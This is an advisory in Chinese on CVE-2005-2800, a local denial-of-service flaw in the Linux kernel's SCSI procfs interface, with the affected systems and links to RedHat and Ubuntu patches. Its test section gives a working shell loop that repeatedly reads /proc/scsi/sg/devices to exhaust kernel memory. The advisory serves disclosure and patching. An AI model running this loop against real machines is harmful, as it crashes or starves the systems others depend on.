发布日期：2005-09-12
更新日期：2006-01-17

受影响系统：

Linux kernel <= 2.6.13
Ubuntu Linux 5.0 4 powerpc
Ubuntu Linux 5.0 4 i386
Ubuntu Linux 5.0 4 amd64
Ubuntu Linux 4.1 ppc
Ubuntu Linux 4.1 ia64
Ubuntu Linux 4.1 ia32

描述：

---

BUGTRAQ  ID: 14790
CVE(CAN) ID: CVE-2005-2800

Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux Kernel的SCSI驱动的procfs接口中存在拒绝服务漏洞。本地攻击者可以反复读取/proc/scsi/sg/devices，而next() iterator返回NULL或错误时没有正确的处理这种情况，耗尽kernel内存，导致拒绝服务。

<*来源：Martin Pitt （martin.pitt@canonical.com）
  
  链接：http://lwn.net/Articles/151082/?format=printable
        http://lwn.net/Alerts/168077/?format=printable
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/bin/sh

while true; do
cat /proc/scsi/sg/devices > /dev/null
done

建议：

---

厂商补丁：

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2006:0101-01）以及相应补丁:
RHSA-2006:0101-01：Important: kernel security update
链接：http://lwn.net/Alerts/168077/?format=printable

Ubuntu
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ubuntulinux.org/

浏览次数：3751
严重程度：0（网友投票）